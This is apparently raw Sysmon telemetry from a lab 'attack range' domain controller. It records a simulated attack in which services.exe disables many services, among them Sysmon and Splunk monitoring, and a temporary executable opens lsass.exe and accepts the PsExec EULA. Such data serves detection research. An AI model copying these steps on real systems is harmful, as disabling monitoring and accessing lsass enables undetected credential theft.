13241300x8000000000000000290856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UEFI\StartDWORD (0x00000004) 13241300x8000000000000000290855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\udfs\StartDWORD (0x00000004) 13241300x8000000000000000290854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UdeCx\StartDWORD (0x00000004) 13241300x8000000000000000290853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Ucx01000\StartDWORD (0x00000004) 13241300x8000000000000000290852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UcmUcsi\StartDWORD (0x00000004) 13241300x8000000000000000290851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UcmTcpciCx0101\StartDWORD (0x00000004) 13241300x8000000000000000290850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UcmCx0101\StartDWORD (0x00000004) 13241300x8000000000000000290849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UASPStor\StartDWORD (0x00000004) 13241300x8000000000000000290848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.129{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UALSVC\StartDWORD (0x00000004) 13241300x8000000000000000290847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\tzautoupdate\StartDWORD (0x00000004) 13241300x8000000000000000290846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\tvnserver\StartDWORD (0x00000004) 13241300x8000000000000000290845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\tsusbhub\StartDWORD (0x00000004) 13241300x8000000000000000290844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\TsUsbGD\StartDWORD (0x00000004) 13241300x8000000000000000290843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\TsUsbFlt\StartDWORD (0x00000004) 13241300x8000000000000000290842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\TrkWks\StartDWORD (0x00000004) 13241300x8000000000000000290841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\TPM\StartDWORD (0x00000004) 13241300x8000000000000000290840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\TieringEngineService\StartDWORD (0x00000004) 13241300x8000000000000000290839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Themes\StartDWORD (0x00000004) 13241300x8000000000000000290838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\TermService\StartDWORD (0x00000004) 13241300x8000000000000000290837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\terminpt\StartDWORD (0x00000004) 13241300x8000000000000000290836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\tdx\StartDWORD (0x00000004) 13241300x8000000000000000290835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\tcpipreg\StartDWORD (0x00000004) 13241300x8000000000000000290834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Tcpip6\StartDWORD (0x00000004) 13241300x8000000000000000290833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Tcpip\ImagePath\SystemRoot\System32\drivers\tcpip.sys 13241300x8000000000000000290832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Tcpip\StartDWORD (0x00000004) 13241300x8000000000000000290831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\TapiSrv\StartDWORD (0x00000004) 13241300x8000000000000000290830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\TabletInputService\StartDWORD (0x00000004) 13241300x8000000000000000290829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\ImagePath\SystemRoot\SysmonDrv.sys 13241300x8000000000000000290828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.113{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\StartDWORD (0x00000004) 13241300x8000000000000000290827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sysmon64\StartDWORD (0x00000004) 13241300x8000000000000000290826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SysMain\StartDWORD (0x00000004) 13241300x8000000000000000290825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Synth3dVsc\StartDWORD (0x00000004) 13241300x8000000000000000290824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\swprv\StartDWORD (0x00000004) 13241300x8000000000000000290823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\swenum\StartDWORD (0x00000004) 13241300x8000000000000000290822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\svsvc\StartDWORD (0x00000004) 13241300x8000000000000000290821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storvsc\ImagePath\SystemRoot\System32\drivers\storvsc.sys 12241200x8000000000000000290820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storvsc\StartOverride 13241300x8000000000000000290819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storvsc\StartDWORD (0x00000004) 13241300x8000000000000000290818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storufs\ImagePath\SystemRoot\System32\drivers\storufs.sys 12241200x8000000000000000290817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storufs\StartOverride 13241300x8000000000000000290816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storufs\StartDWORD (0x00000004) 13241300x8000000000000000290815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\StorSvc\StartDWORD (0x00000004) 13241300x8000000000000000290814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storqosflt\StartDWORD (0x00000004) 13241300x8000000000000000290813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\stornvme\ImagePath\SystemRoot\System32\drivers\stornvme.sys 12241200x8000000000000000290812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\stornvme\StartOverride 13241300x8000000000000000290811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\stornvme\StartDWORD (0x00000004) 13241300x8000000000000000290810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storflt\ImagePath\SystemRoot\System32\drivers\vmstorfl.sys 12241200x8000000000000000290809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storflt\StartOverride 13241300x8000000000000000290808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storflt\StartDWORD (0x00000004) 534500x8000000000000000290807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.097{C8EA50B7-12EA-6216-6805-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000290806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storahci\ImagePath\SystemRoot\System32\drivers\storahci.sys 12241200x8000000000000000290805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storahci\StartOverride 13241300x8000000000000000290804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.097{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\storahci\StartDWORD (0x00000004) 13241300x8000000000000000290803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\stisvc\StartDWORD (0x00000004) 13241300x8000000000000000290802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\stexstor\ImagePath\SystemRoot\System32\drivers\stexstor.sys 12241200x8000000000000000290801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\stexstor\StartOverride 13241300x8000000000000000290800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\stexstor\StartDWORD (0x00000004) 13241300x8000000000000000290799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SstpSvc\StartDWORD (0x00000004) 13241300x8000000000000000290798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SSDPSRV\StartDWORD (0x00000004) 13241300x8000000000000000290797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\srvnet\StartDWORD (0x00000004) 13241300x8000000000000000290796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\srv2\StartDWORD (0x00000004) 13241300x8000000000000000290795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\srv\StartDWORD (0x00000004) 13241300x8000000000000000290794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Spooler\StartDWORD (0x00000004) 10341000x8000000000000000290793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.082{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EA-6216-6805-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.082{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EA-6216-6805-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SplunkMonitorNoHandle\StartDWORD (0x00000004) 13241300x8000000000000000290790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SplunkForwarder\StartDWORD (0x00000004) 13241300x8000000000000000290789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\splunkdrv\StartDWORD (0x00000004) 13241300x8000000000000000290788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\splknetdrv\StartDWORD (0x00000004) 13241300x8000000000000000290787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SpbCx\StartDWORD (0x00000004) 13241300x8000000000000000290786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\spaceport\ImagePath\SystemRoot\System32\drivers\spaceport.sys 13241300x8000000000000000290785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\spaceport\StartDWORD (0x00000004) 13241300x8000000000000000290784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SNMPTRAP\StartDWORD (0x00000004) 13241300x8000000000000000290783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.082{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\smphost\StartDWORD (0x00000004) 13241300x8000000000000000290782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\smbdirect\StartDWORD (0x00000004) 13241300x8000000000000000290781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SiSRaid4\ImagePath\SystemRoot\System32\drivers\sisraid4.sys 12241200x8000000000000000290780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SiSRaid4\StartOverride 13241300x8000000000000000290779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SiSRaid4\StartDWORD (0x00000004) 13241300x8000000000000000290778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SiSRaid2\ImagePath\SystemRoot\System32\drivers\SiSRaid2.sys 12241200x8000000000000000290777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SiSRaid2\StartOverride 13241300x8000000000000000290776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SiSRaid2\StartDWORD (0x00000004) 13241300x8000000000000000290775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:43.066{C8EA50B7-12EA-6216-6805-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 13241300x8000000000000000290774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ShellHWDetection\StartDWORD (0x00000004) 13241300x8000000000000000290773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SharedAccess\StartDWORD (0x00000004) 13241300x8000000000000000290772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sfloppy\StartDWORD (0x00000004) 13241300x8000000000000000290771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SessionEnv\StartDWORD (0x00000004) 